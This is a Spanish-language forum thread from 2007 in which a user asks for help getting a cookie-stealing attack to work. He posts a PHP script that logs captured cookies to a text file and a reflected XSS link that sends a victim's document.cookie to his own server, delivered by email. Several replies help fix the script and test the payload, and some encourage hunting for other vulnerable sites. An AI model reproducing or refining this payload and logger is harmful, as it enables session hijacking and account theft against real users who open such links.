He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies.
Para ello:
-He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie.
-Mando un email con un hipervínculo a la url vulnerable+script.
El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS
Adjuntos:
Mi script PHP
<?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?>
Lo que pongo en el hipervínculo:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script>
y estas seguro que esa persona esta logueada?
pork de no ser asi recibiras el archivo en blanco..
y creo que en el txt te falta el $_GET para capturar la Cookie desde el link
con el metodo get
=D
Suerte ;D
Cita de: magarcan en 28 Noviembre 2007, 12:56 PM
He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies.
Para ello:
-He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie.
-Mando un email con un hipervínculo a la url vulnerable+script.
El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS
Adjuntos:
Mi script PHP
<?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?>
Lo que pongo en el hipervínculo:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script>
Dale
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie+'blabla'</script>
Gracias por las respuestas.
Cita de: EvilGobliny estas seguro que esa persona esta logueada?
Sí, porque estoy haciendo las pruebas con una cuenta de mail que me he creado para hacer las pruebas.
Cita de: EvilGobliny creo que en el txt te falta el $_GET para capturar la Cookie desde el link
¿En que parte del código?
Cita de: Ing_AmcDale
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie+'blabla'</script>
Ahora mismo lo pruebo. Por cierto, ¿qué hace eso que has añadido?
te dice que le agreges una cadena, para comprobar verdaderamente si guarda el texto ;P
si te guarda solo "blablabla"
es que no habia cookie para guardar ^^
Ok, el caso es que no me crea el archivo, por lo que pienso que la url vulnerable que utilizo ha sido arreglada. Ahora me toca buscar nuevas. :-\
A ver si tengo suerte.
Creo que no es nada dificil comprobar si el error de XSS sigue funcionado :P
se supone q vos lo encontraste.....
y no sabes como capturar la cookie?
xDD no entiendo aun como pudiste encontrarlo.. y menos aun como no sabes comprobar si funciona o no... y capturar la cookie -.-
aniway! ^^=D
MUCHA SUERTE (Y)
Definitivamente la vulnerabilidad ha sido corregida (es que la descubrí hace tiempo cuando empecé a estudiar los XSS).
Me toca descubrir otra vulnerabilidad para hacer pruebas y ver si con mi código me guarda las cookies.
PD: en la entrada XSS de la wikipedia hay otro código para guardar las cookies más currado que el mío, a lo mejor lo adopto.
PD2: si me recomendáis algún link sobre XSS nunca está de más.
---GRACIAS---
Seguro que tardas bien poco en encontrar otro bug... internet esta plagado de XSS...
Mira este link sobre los XSS (esta muy currado ;)):
http://icenetx.net/sesiones/tutos/XSS-a-fondo-por-trew.pdf (http://icenetx.net/sesiones/tutos/XSS-a-fondo-por-trew.pdf)
Saludos
Cita de: zhynar_X en 28 Noviembre 2007, 21:57 PM
Seguro que tardas bien poco en encontrar otro bug... internet esta plagado de XSS...
Mira este link sobre los XSS (esta muy currado ;)):
http://icenetx.net/sesiones/tutos/XSS-a-fondo-por-trew.pdf (http://icenetx.net/sesiones/tutos/XSS-a-fondo-por-trew.pdf)
Saludos
Muy buen documento me lo lei completito ;D
Hola, recomiendo crear el txt primero.
Saludos.
Cita de: G4rBaG3 en 29 Noviembre 2007, 21:29 PM
Hola, recomiendo crear el txt primero.
Saludos.
Indicando el modo "a" al abrir el archivo crea autmomaticamente el txt
Saludos!
si no te genera/escribe en el documento es por que no tienes lo spermisos apra escribir en el, dale permisos de escritura ¬¬
para verificar que sea vulnerable es facil ¬¬
si tu pagina esta en un server de internet dificilmente tenga permisos para escribir, si esta en tu pc dale permisos y sino usa sql y crea una tabla, insertas la cookie como dato y listo.
Verifica q las cosas funcionen por pasos, no crees todo y dsp no sabes q es lo q no anda jeje.
Saludos!!
Aprende PHP primero xD
Cita de: Ing_Amc en 29 Noviembre 2007, 23:41 PM
Aprende PHP primero xD
=$ por eso estoy en PHP .. (aparte de q es un idioma con futuro)
me dijeron una vez... "si sabes programar en PHP, ASP, HTML, javascript, JAVA y sabes usar SQL como lo aria un gran programador Web, el hacking seria algo Trivial"
=D
Suerte ! =D
PD:GRAN TEXTO!.. Lo estoy leyendo
Cita de: EvilGoblin en 30 Noviembre 2007, 19:27 PM
Cita de: Ing_Amc en 29 Noviembre 2007, 23:41 PM
Aprende PHP primero xD
=$ por eso estoy en PHP .. (aparte de q es un idioma con futuro)
me dijeron una vez... "si sabes programar en PHP, ASP, HTML, javascript, JAVA y sabes usar SQL como lo aria un gran programador Web, el hacking seria algo Trivial"
=D
Suerte ! =D
PD:GRAN TEXTO!.. Lo estoy leyendo
1.- No te lo dije a ti.
2.- Por eso pasé el thread para acá.
:rolleyes:
Cita de: Ing_Amc en 30 Noviembre 2007, 23:13 PM
Cita de: EvilGoblin en 30 Noviembre 2007, 19:27 PM
Cita de: Ing_Amc en 29 Noviembre 2007, 23:41 PM
Aprende PHP primero xD
=$ por eso estoy en PHP .. (aparte de q es un idioma con futuro)
me dijeron una vez... "si sabes programar en PHP, ASP, HTML, javascript, JAVA y sabes usar SQL como lo aria un gran programador Web, el hacking seria algo Trivial"
=D
Suerte ! =D
PD:GRAN TEXTO!.. Lo estoy leyendo
1.- No te lo dije a ti.
2.- Por eso pasé el thread para acá.
:rolleyes:
ya se que no fue para mi =$.. solo segui el hilo xDDDD
esk fue asi ;P.. hasta hace poco solo estaba en C yo .. y ahora estoy en PHP y todo lo q tenga q ver con programacion Web ^^
Suerte (Y)
esto no va aqui..
pordios xD en el foro de bugs y exploits se discuten exploits en PHP, C, Perl, javascript, etc.. y no por eso lo pasamos al foro de programacion de PHP, ni de C, ni de Scripting..
Saludos!!
Cita de: zhynar_X en 28 Noviembre 2007, 21:57 PM
Seguro que tardas bien poco en encontrar otro bug... internet esta plagado de XSS...
Mira este link sobre los XSS (esta muy currado ;)):
http://icenetx.net/sesiones/tutos/XSS-a-fondo-por-trew.pdf (http://icenetx.net/sesiones/tutos/XSS-a-fondo-por-trew.pdf)
Saludos
XSS no necesita tanto manual, aqui mismo hay varias referencias y con saber javascript XSS es cualquier tonteria...yo mismo hice una mini orientacion sobre este tema, en este foro esta plagado de esto....
Salu2